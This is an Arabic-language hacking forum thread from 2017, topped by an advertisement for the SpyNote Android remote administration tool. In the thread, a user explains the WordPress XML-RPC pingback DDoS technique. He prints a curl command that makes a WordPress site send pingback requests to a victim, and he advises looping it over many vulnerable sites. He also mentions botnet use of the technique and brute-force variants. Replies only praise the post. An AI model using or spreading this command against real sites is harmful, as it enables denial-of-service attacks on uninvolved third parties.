1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

[ نقاش ] هجمات ال WordPress Pingback DDoS attack via XML-RPC

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Mr.7nsh, بتاريخ ‏6 يوليو 2017.

كاتب الموضوع : Mr.7nsh المشاهدات : 148 الردود : 2 ‏6 يوليو 2017
حالة الموضوع:
مغلق
  1. غير متصل

    Mr.7nsh
    rankrank
    Developer

    عضو منذ:
    ‏7 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:

    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيفكم اخواني ان شاء الله بألف خير

    ندخل في الموضوع على طوول

    [​IMG]

    [​IMG]


    اليوم في جولة بسيطة لملفات اللوق بسيرفرات المنتدى و جدت شىء لفتنى كثيرا .

    [​IMG]

    WordPress Pingback DDoS attack via XML-RPC

    اي نعم الثغرة منذ مارس 2014 و لا يزال تطبيقها على المنتدى الى يومنا هذا و ايام كان السيرفر واقع بخطاء 500 كان وقتها فيه هجوم على السيرفر بنفس الثغرة .

    المهم لاحظت ان : الأخ Mr_AnarShi-T قام بتطوير الفكرة بشكل جميل جدا هنا في المنتدى لأستغلال الثغرة لعمل بريت فورس

    بصراحة الموضوع يستحق متابعة فالثغرة مزالت شغالة لحد يومنا هذا و الأطفال مزالوا يلعبون بها الله يرفع عليهم البلاء.

    تقريبا لم اجد محتوى عربي كثير متطرق للموضوع لذلك كتبت الموضوع و ان كان يعتبر قديم و لكن على الأقل قد يفيد البعض كافكار بالخصوص انه مزال كثير مواقع مصابين بالثغرة.

    و على فكرة الثغرة تم استغلالها في برمجة اكواد بعض البوت نت الخاصين بهجومات الديدوس.

    و الأستغلال البسيط للثغرة هو كالتالى :

    كود PHP:
    curl -"www.wordpresssite.com/xmlrpc.php" -d
    'pingback.pinghttp://victim.comwww.wordpresssite.com/postchosen'
    و كل شخص و كيف يستغل ال curl في حلقة تنتهى بانتهاء عدد المواقع المصابة التى يقدر ان يحصل عليها.

    يمكن ايضا فحص اذا الموقع مصاب او لا من خلال الموقع هذا :

    كود HTML:
    http://sitecheck.sucuri.net/results/www.victime.com
    و هذاين مثالين على موقعين واحد مصاب و الأخر غير مصاب :

    المصاب .

    [​IMG]

    الغير مصاب :

    [​IMG]


    [​IMG]

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

     


    أعجب بهذه المشاركة Mohmaed
    جاري تحميل الصفحة...
  2. غير متصل

    Mohmaed .:: super ::.
    V • I • P

    عضو منذ:
    ‏12 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    942
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    24

    ما شاء الله ظهر الابداع لنا من جديد

    استمر نحو الافضل
    لا تحرمنا من جديدكم
     


  3. غير متصل

    ƊЄƔƖԼ ƇƠƊЄƦ Developer Plus
    DeveloPer Plus

    عضو منذ:
    ‏18 ابريل 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    510
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    حرامي محترف
    الإقامة:

    ابدعت يا غالي
    ما قصرت
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...